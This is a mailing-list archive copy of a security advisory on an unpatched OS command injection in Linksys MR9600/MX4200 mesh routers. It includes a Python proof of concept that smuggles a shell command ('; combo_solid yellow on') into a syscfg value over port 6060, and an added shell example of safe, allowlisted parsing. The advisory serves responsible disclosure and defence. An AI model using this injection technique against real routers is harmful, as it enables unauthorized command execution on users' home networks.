[SYSS-2025-011] Linksys MX9600/MX4200 - OS Command Injection

Full Disclosure mailing list archives


From: Christian Zäske via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Feb 2026 11:13:22 +0100

Advisory ID:               SYSS-2025-011
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type:        OS Command Injection (CWE-78)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing neutralization of special elements, OS commands can
be injected via the update functionality of a TLS-SRP connection,
which is normally used for configuring devices inside the mesh
network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides a service (sct_server
binary) running on TCP port 6060, which is used to integrate other mesh
devices into the network. The service accepts TLS-SRP connections with
a username and password.

The service supports an update request, which can be used to set
"syscfg" variables on the device. The script
"/tmp/cron/cron.everyminute/offline-notifier.cron" is executed every
minute and sets "syscfg" variables containing "node-off" as environment
variables using the following lines:

  VARS="$(syscfg show |
          grep node-off |
          sed -r "s/^[^:]+:://g" |
          while read i; do
              echo "$i;"
          done)"
  eval $VARS

Usually, the variable "VARS" is set to a value similar to the following:

  $ syscfg show | grep node-off

  node-off::min_offline_time=3
  node-off::enabled=1
  node-off::cache_dir=/tmp/msg
  node-off::enable_cloud=1
  node-off::debug=0

  $ syscfg show | grep node-off | sed -r "s/^[^:]+:://g" | while read i; do echo -n "$i; "; done
  min_offline_time=3; enabled=1; cache_dir=/tmp/msg; enable_cloud=1; debug=0;

By using the service on port 6060, an update request can be sent to the
device, which can be used to set an arbitrary "syscfg" entry. If this
entry contains ";", OS commands can be injected into the "VARS"
variable, which will be used by eval.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will result
in the LED indicator at the top of the device turning yellow, indicating
that the OS command was executed successfully:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.connect(("192.168.1.1", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP(srp_username, srp_pass)

  conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))
  conn.sendall('{"version": "0.1", "type": "update", "client_id": "node-off", "data": {"WLAN": {"syscfg": [{"SySS": "; combo_solid yellow on"}]}}}'.encode('utf8'))

This code results in the following "syscfg" value being set:

  $ syscfg show | grep SySS
  node-off::SySS=; combo_solid yellow on

When parsed by the script "offline-notifier.cron", the following line
will be executed by eval, resulting in the indicator LED turning yellow
after a maximum of 60 seconds:

  $ syscfg show | grep node-off | sed -r "s/^[^:]+:://g" | while read i; do echo -n "$i; "; done
  min_offline_time=3; enabled=1; cache_dir=/tmp/msg; enable_cloud=1; debug=0; SySS=; combo_solid yellow on;
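
Added example (not part of the SySS advisory and not Linksys firmware
code): one way a script could read the "node-off" entries without eval,
validating each key and value and treating the value purely as data.
The function names, the key allowlist (taken from the usual entries
shown above) and the per-key value rules are assumptions; the sample
input is constructed and includes the entry set by the PoC.

```shell
#!/bin/sh
# Added example, not Linksys firmware code; function names are hypothetical.

# Constructed `syscfg show` excerpt: the advisory's usual entries plus the PoC entry.
sample_syscfg() {
    cat <<'EOF'
node-off::min_offline_time=3
node-off::enabled=1
node-off::cache_dir=/tmp/msg
node-off::enable_cloud=1
node-off::debug=0
node-off::SySS=; combo_solid yellow on
EOF
}

# Reads `syscfg show` output on stdin and prints only validated key=value
# pairs. Values are treated as data: no eval, no word splitting.
load_node_off() {
    while IFS= read -r line; do
        case "$line" in node-off::*=*) ;; *) continue ;; esac
        entry=${line#node-off::}
        key=${entry%%=*}
        value=${entry#*=}
        ok=1
        case "$key" in
            min_offline_time)           # non-empty decimal number
                case "$value" in ''|*[!0-9]*) ok=0 ;; esac ;;
            enabled|enable_cloud|debug) # boolean flag
                case "$value" in 0|1) ;; *) ok=0 ;; esac ;;
            cache_dir)                  # plain path below /tmp, no ".."
                case "$value" in /tmp/*) ;; *) ok=0 ;; esac
                case "$value" in *[!A-Za-z0-9_./-]*|*..*) ok=0 ;; esac ;;
            *) ok=0 ;;                  # unknown key, e.g. the PoC's "SySS"
        esac
        if [ "$ok" -eq 1 ]; then
            printf '%s=%s\n' "$key" "$value"
        else
            printf 'rejected: %s\n' "$line" >&2
        fi
    done
}

# Prints the number of node-off entries on stdin that fail validation.
count_rejected() {
    load_node_off 2>&1 >/dev/null | grep -c '^rejected: ' || true
}

sample_syscfg | load_node_off
```

On the sample input the five usual entries are printed and the PoC
entry is reported on stderr as rejected; count_rejected can serve as a
check for unexpected "node-off" entries on a device.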

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-011.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske () syss de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Attachment: OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2026/Feb/18